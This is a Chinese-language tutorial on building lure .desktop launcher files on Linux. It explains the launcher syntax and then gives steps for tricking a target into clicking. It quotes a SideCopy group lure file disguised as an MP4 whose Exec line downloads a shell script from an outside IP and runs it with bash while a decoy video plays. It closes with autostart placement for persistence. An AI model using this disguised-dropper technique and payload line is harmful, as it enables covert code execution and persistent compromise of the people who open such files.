在Linux系统上创建诱饵文件(.Desktop)

.desktop文件制作简单说明~

0x01 Linux桌面启动器

可以添加桌面启动器诱导目标点击，类似于Windows系统上的快捷方式。在linux中，一切皆文件。启动器就是一个后缀为.desktop文件。

如创建一个intelliJ idea 的启动器

[Desktop Entry]
Encoding=UTF-8
Name=IntelliJ IDEA
Name[en]=IntelliJ IDEA
Name[en_US]=IntelliJ IDEA
GenericName=IntelliJ IDEA
Comment=The Java IDE for Professional Developers by JetBrains
Exec=/opt/SoftWare/idea-IU-172.4343.14/bin/idea.sh %f
Icon=/opt/SoftWare/idea-IU-172.4343.14/bin/idea.png
Terminal=false
Type=Application
Categories=Application;Programme;

国家地区代码表 http://www.lingoes.net/zh/translator/langcode.htm

语法解释

关键词	意义
[Desktop Entry]	文件头
Encoding	编码
Name	应用名称
Name[xx]	不同语言的应用名称
GenericName	描述
Comment	注释
Exec	执行的命令
Icon	图标路径
Terminal	是否使用终端
Type	启动器类型
Categories	应用的类型（内容相关）

说明：
其中 Exec 常用的参数有：%f %F %u %U
%f：单个文件名，即使选择了多个文件。如果已选择的文件不在本地文件系统中（比如说在HTTP或者FTP上），这个文件将被作为一个临时文件复制到本地，％f将指向本地临时文件；
%F：文件列表。用于程序可以同时打开多个本地文件。每个文件以分割段的方式传递给执行程序。
%u：单个URL。本地文件以文件URL或文件路径的方式传递。
%U：URL列表。每个URL以分割段的方式传递给执行程序。本地文件以文件URL或文件路径的方式传递。

0x02 利用实现

.Desktop文件创建创建流程

1. 创建一个以.desktop为后缀的文件。
2. 编写内容根据实际情况修改权限。
3. 测试启动，添加信任。
4. 移动到/usr/share/applications/目录下

如SideCopy组织使用的诱饵文件NAMO.mp4.desktop内容为

[Desktop Entry] 
Encoding=UTF-8 
Name=Army.mp4 
Exec=sh -c "/usr/bin/wget 'http://assessment.moiochamns.comfunloads/v/3.php' -0 /tmp/NAMO.mp4; /usr/bin/wget 'http://144.91.81.180/cmd.sh' -0 /tmp/exe.sh; cd /tmp; chmod +x exe.sh;vlc /tmp/NAMO.mp4 | bash exe.sh
Terminal=false 
Type=Application 
Icon=video-x-generic 
Name[en_US]=NAMO.mp4 

当目标点击后将会自动下载诱饵视频NAMO.mp4，于此同时也会下载cmd.sh以便后续执行操作。

0x03 自启动

Linux程序.desktop文件几乎都放置在两个目录中：

• /usr/share/applications/目录，该目录所有用户可见。
• ~/.local/share/applications/目录，该目录当前用户可见。

若是需要开机自动启动程序，则需把.desktop文件放置在~/.config/autostart/，这样就可以实现自启动。

0x04 参考链接

• https://ti.qianxin.com/blog/articles/Sidecopy-dual-platform-weapon/
• https://linux.cn/article-9199-1.html